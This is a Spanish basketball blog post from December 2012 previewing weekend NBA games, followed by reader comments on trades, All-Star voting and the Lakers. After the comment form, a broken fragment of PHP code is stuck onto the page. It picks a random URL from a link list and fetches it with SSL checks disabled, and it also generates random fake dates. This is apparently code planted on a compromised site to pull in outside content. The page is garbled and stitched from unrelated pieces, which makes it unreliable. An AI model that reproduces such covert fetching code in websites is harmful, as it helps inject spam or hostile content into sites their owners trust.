Fin de semana. Os dejamos la nevera llena

21 de December de 2012 por txusma

…así que os podéis dedicar a lo que realmente nos gusta: mirar NBA.

25 partidos tenemos entre viernes, sábado y domingo. Muchos muy interesantes.

Viernes 22

Para empezar un Magic – Raptors. Si a principio de temporada me dicen que tendría algún tipo de interés en este partido le habría respondido que si se había vuelto loco pero la realidad es que se enfrentan 2 equipos que llevan 4 victorias consecutivas. Calderon intentará mantener la racha de los suyos ante unos Magic que están sorprendiendo a propios y extraños. Glen Davis se ha lesionado para un par de semanas así que es posible que veamos al rookie Andrew Nicholson disfrutando de minutos importantes.

Los Knicks reciben a los Bulls en un partido que seguro será muy competido, los Hawks visitan a unos Sixers que siguen sin ganar desde que se lesionó Holiday y los Celtics reciben a los siempre peligrosos Bucks. El Mavericks – Grizzlies cuenta con el morbo adicional de ver a OJ Mayo enfrentarse a su antiguo equipo. Seguro que le tiene muchas ganas.

Sábado 23

El Lakers – Warriors destaca por encima de cualquier otro partido por muchas razones: por el interés que siempre despiertan los de Los Angeles, por ver que nueva rotación se inventa Mike D’Antoni, por comprobar si Pau Gasol decide ponerse a postear de verdad de una vez, por confirmar el destrozo que les puede hacer Stephen Curry desde la posición de base… Pinta a partido entretenido de verdad con Lee, Curry, Thompson, Jack y compañía buscando hurgar en la herida amarilla. Los Lakers tendrán que dar lo mejor de sí mismos para imponerse.

Los Heat reciben a los Jazz en un partido que podría tener interés de disputarse en Salt Lake City, Bulls  y Hawks se enfrentan tras disputar ambos partidos el día anterior y los Grizzlies visitan Houston tras el duro partido que seguro les plantearán los Mavs el viernes. Difícil para Marc y los suyos.

Domingo 24

Del domingo nos quedamos con el Wolves – Knicks. Minnesota sigue por encima del 50% y Ricky Rubio va incorporándose poco a poco a la dinámica. Nos molaban a principio de temporada y más nos molarán conforme vaya avanzando la temporada. Finiquitaron la racha de los Thunder y ahora quieren vencer en el siempre difícil Madison Square Garden. A pocos kilómetros de allí, los Nets reciben a los Sixers. Si ha vuelto Jrue Holiday habrá pelea, si no…

Domingo será también día de duelo clásico del Oeste. Dallas y San Antonio se enfrentan con favoritismo claro de estos últimos a pesar de haber bajado un poco el pistón. En Orlando, los Magic reciben a los Jazz. Dura papeleta para Vucevic, Nicholson, Ayón, etc… El juego interior de Utah los puede hacer añicos.

Comenta

28 comentarios a esta entrada

  1. Esteban dice:
    #1

    Al parecer la oferta sugerida para hacerse con los servicios del pívot brasileño incluye a Kendrick Perkins, Perry Jones III, Jeremy Lamb y una elección de primera ronda que poseen de los Toronto Raptors.

    q buen trade seria para ambos realmente

    los cavs, perderian a un gran centro, pero que no acompaña en edad a los jovenes que poseen, en cambio se harian de jones y lamb, que pueden dar mucho a futuro si se los trabaja y le dan tiempo en pista

    el thunder consigue a un pivot de un gran gran momento, mucho mejor que perkins, y solo entrega a dos jugadores con mucho potencial pero que no tienen ni remotamente cerca minutos en pista, asi dificil que se integren al equipo

      Citar

  2. Ekos dice:
    #2

    A puntito para ver el Pacers-Cavs, muy bien ambiente en Cleveland.

      Citar

  3. Ekos dice:
    #3

    Y el traspaso propuesto por Esteban no es que me agrade mucho como Cavalier que soy, y menos viendo como está Varejao.

      Citar

  4. Ekos dice:
    #4

    Menudo triple se ha cascado el bueno de Pierce, está enrachado. Sobre los Cavs, se nota demasiado la falta de Varejao, correcto Zeller de todas formas, por otra parte, muy desacertados Irving y Waiters hoy, y Gee cada día me gusta más.

    Y ahora a ver la prróroga de los Bucks-Celtics, muy buen partido.

      Citar

  5. Ekos dice:
    #5

    Vencieron los Bucks, gran partido en líneas generales de todos sus jugadores, que contrasta con los Celtics, en los cuales sólo fue Pierce, Pierce… y Pierce. Rondo normalillo y sólo Green y Lee bien.

      Citar

  6. simon dice:
    #6

    http://www.youtube.com/watch?feature=player_embedded&v=E3bIQf57N_Q
    faried se entrega tanto en los partidos que acaba como acaba…

      Citar

  7. Chipi dice:
    #7

    Pedazo de triple doble de David Lee. Qué contento tiene que estar su dueño en la Hoops xD

      Citar

  8. Esteban dice:
    #8

    DAVID LEE debe eser el ala pivote titular en el all star para el oeste?

    hoy creo que solo griffin le supera en relación eficacia/victorias, griffin, zach y lee como 4 para el oeste, Marc y Howard como 5

      Citar

  9. Moloneador dice:
    #9

    Esteban:
    DAVID LEE debe eser el ala pivote titular en el all star para el oeste?

    hoy creo que solo griffin le supera en relación eficacia/victorias, griffin, zach y lee como 4 para el oeste, Marc y Howard como 5

    y el bueno de Tim Duncan?

      Citar

  10. Jose Luis dice:
    #10

    titular imposible, eso va por votos. Yo creo que irán Durant, Griffin y Duncan, tened en cuenta que no hay demarcación de pívot en las votaciones y por tanto no tiene porqué haber un 5 puro.

      Citar

  11. Lucho dice:
    #11

    como que no hay pivot?
    no son 2 guards, 2 aleros y 1 center?

      Citar

  12. Ekos dice:
    #12

      Citar

  13. Ekos dice:
    #13

    Vuelve Nash hoy.

      Citar

  14. Lucho dice:
    #14

    Ah oh, gracias Ekos no sabia. Estaba equivocado

      Citar

  15. Ekos dice:
    #15

    No hay de qué 😉

      Citar

  16. pronosticos deportivos dice:
    #16

    Tengo muchas ganas de ver el Knicks-Wolves de esta noche, me parece que hoy toca trasnochar para ver este auténtico partidazo. Y Ricky acercándose a ser lo que era antes de la lesión… I love this game!

      Citar

  17. Denise dice:
    #17

    No he visto el partido de Lakers, pero viendo el box-score me da grima y asco ….como puede permitir un entrenador que un jugador se marque un 16/41 en tiros de campo por mucho jugador franquicia que sea, y que Jordan Hill tire mas veces que tu fichaje estrella en la pintura..

    Desde mi punto de vista de entender el baloncesto, marcarse un 16/41 me parece algo propio de un impresentable egoista, y una falta enorme de respeto a los compañeros. Pero el principal culpable es el que se lo permite.

    Y me parece un error hacer rotaciones de solo 8-9 jugadores (mas aun en un partido con prorroga), y mas aun dejando a Jamison, y dos jugadores aprovechables como Ebanks o Clark sin jugar.
    A pesar de que Clark no juega nada, no es mala pieza teniendo un rol de 5-10 minutos de intensidad defensiva

      Citar

  18. simon dice:
    #18

    Acabo de ver que Dallas ha cortado a Derek Fisher… cuando estaba jugando a un muy buen nivel. A no ser que la lesión que era para dos semanas al final sea algo mas gordo…no lo entiendo la verdad. Volverá a Lakers? Irá a otro contendiente?

      Citar

  19. melo15 dice:
    #19

    Simon, parece ser que Fisher solicito a la directiva de Dallas que lo cortaran porque deseaba estar con su familia, se ve que tenia problemas familiares.

      Citar

  20. Pikerton64 dice:
    #20

    Siempre tardo tanto es escribir los comentarios que se me adelantan.
    ¿Así que Kobe tiró más del triple que World Peace, metió solo el doble y no hizo ni dos veces la anotación de Artest? No les veo jugar, ya pierdo mucho tiempo con mi equipo, pero ¿alguien me puede explicar cómo Howard tiró menos que el rookie Harrison Barnes, el sophomore Klay Thompson o el AllStar Jodie Meeks (o Jordan Hill, como apunta Denise)? Y pongo de ejemplo dos de GSW que son 5° y 3° opción en ataque, mientras Howard debería ser segunda estrella en LAL.
    Añadir que me sorprende la victoria de Los Ángeles y la cantidad de minutos de Nash. Landry creo que se ha desinflado.

    Memphis vuelve a perder y Portland y Lakers llevan una buena racha que les saca del pozo, acechando a los Wolves e incluso a Houton en sus posiciones.

      Citar

  21. Ruxixón dice:
    #21

    Si no me equivoco el día que Kobe metió los 81 puntos contra los Raptors tiró 46 veces…cerca se quedó esta noche en número de tiros.

      Citar

  22. MagicJohnson32 dice:
    #22

    Pues el Warriors-Lakers fue un partido precioso, con mucho mérito por parte de LA porque remontarle y ganarle a un equipo con la confianza de los actuales GSW es extremadamente difícil, y más con los problemas de faltas de Howard todo el partido. Nash dejó muy buenas sensaciones y un par de acciones clave, y Artest confirmó que está en su mejor momento en años. Kobe tiró demasiado, es incuestionable, pero es ridículo que no le pitasen ni una sola falta en 44 minutos (el único tiro libre que lanzó fue por una defensa ilegal) y con un arbitraje normal en ese sentido la estadística de tiros no habría acabado tan inflada. Además, se entonó en el momento más necesario y anotó 7 de 13 en los últimos 15 minutos o así. Muy buenos minutos por parte de Hill y Meeks, y Gasol irregular pero trabajador y dejando varias asistencias geniales jugando desde el poste medio-alto, exactamente lo que debe hacer en este sistema. Por los Warriors, brutal partido de Jack, por encima de Curry, Lee y Thompson. Estuvo a punto de ganar el partido él.

      Citar

  23. Denise dice:
    #23

    simon:
    Acabo de ver que Dallas ha cortado a Derek Fisher… cuando estaba jugando a un muy buen nivel. A no ser que la lesión que era para dos semanas al final sea algo mas gordo…no lo entiendo la verdad. Volverá a Lakers?Irá a otro contendiente?

    Y Dallas responde fichando a Douglas-Roberts, quien hizo la pretemporada con Lakers.

    Y si Fisher se fuese a Clippers?? Ya sé que a Clippers no les hace falta, pero estaría bien que jugase con el otro equipo de la ciudad, el mejor equipo de Los Ángeles actualmente.

      Citar

  24. HisRoyalAirness dice:
    #24

    Estoy con Denise, lo de los tiros es lamentable. Y no sólo por lo que tira él sino por lo que no tiran los demás.
    Es una barbaridad jugar con Nash, Gasol y Howard, todos múltiples veces All-Star, y tirar 20 tiros más que los 3 juntos. Me parece insultante.

      Citar

  25. Ekos dice:
    #25

    Knicks-Wolves, partidazo.

      Citar

  26. MagicJohnson32 dice:
    #26

    Sorpresón, ha vuelto Dirk!

      Citar

  27. Ekos dice:
    #27

    Pero qué partidazo el Wolves-Knicks, Carmelo en modo MVP en el último cuarto, porque hasta ahí… sobresaliente Pekovic también.

      Citar

  28. Ekos dice:
    #28

    Dios mío los SPURS!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>